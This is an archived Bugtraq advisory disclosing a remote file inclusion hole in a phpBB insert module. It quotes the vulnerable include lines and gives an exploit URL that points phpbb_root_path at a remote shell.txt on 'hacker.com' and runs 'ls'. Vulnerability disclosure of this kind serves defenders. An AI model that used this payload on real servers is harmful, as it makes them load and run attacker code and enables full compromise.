Phpbb insert mod Remote file include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Phpbb insert mod Remote file include
From: By_KorsaN_Son@xxxxxxxxxxx
Date: 12 Oct 2006 17:34:20 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

$ BiyoSecurity.Org & SecurityWall.Org

$ Script Name : Phpbb insert module

$ versions : 0.1.0 and 0.1.1

$ Risk : High

$ Regard : KorsaN

$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra

$ Vulnerable File : functions_mod_user.php

$ Vulnerable code : 

<-- code start -->


include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);
 

$ Exploit : 

www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls

Prev by Date: Black Hat CFP, Registration, and Announcements for October
Next by Date: Google Earth (kml & kmz files) buffer overflow
Previous by thread: Black Hat CFP, Registration, and Announcements for October
Next by thread: Google Earth (kml & kmz files) buffer overflow
Index(es):
- Date
- Thread